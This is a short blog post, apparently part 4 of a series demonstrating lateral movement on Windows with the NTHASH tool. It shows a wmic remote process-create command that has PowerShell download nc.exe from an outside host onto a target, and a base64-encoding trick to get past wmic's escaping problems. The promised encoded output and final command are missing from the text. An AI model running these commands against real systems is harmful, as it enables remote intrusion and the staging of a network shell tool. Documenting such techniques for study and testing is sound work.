Oct 292019

lets again introduce a variant of previous article.

Ideally we would be using the windows built in wmic command rather that the nthash runwmi verb.

Unfortunately, wmic can be a pita with escaping characters in some situations, especially when combining with powershell.

The below for instance wont work because of the ‘,’ comma character.

wmic /node:target process call create « powershell.exe -c (New-Object System.Net.WebClient).DownloadFile(‘http://erwan.labalec.fr/uploads/nc.exe’,’c:\temp\nc.exe’) »

The trick/workaround is to base64encode (unicode) the powershell command.

NTHASH-win64.exe /base64encodew /input:(New-Object System.Net.WebClient).DownloadFile(‘http:%2f%2ferwan.labalec.fr%2fuploads%2fnc.exe’,’c:\temp\nc.exe’);

Which will give you the following :


You can then execute a powershell command on a remote target using wmic like below :


  One Response to “Demonstrating lateral movement with NTHASH Part #4”

  1. […] previous article, we have introduced the used of WMIC in a « pass the hash » […]

 Leave a Reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>



Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.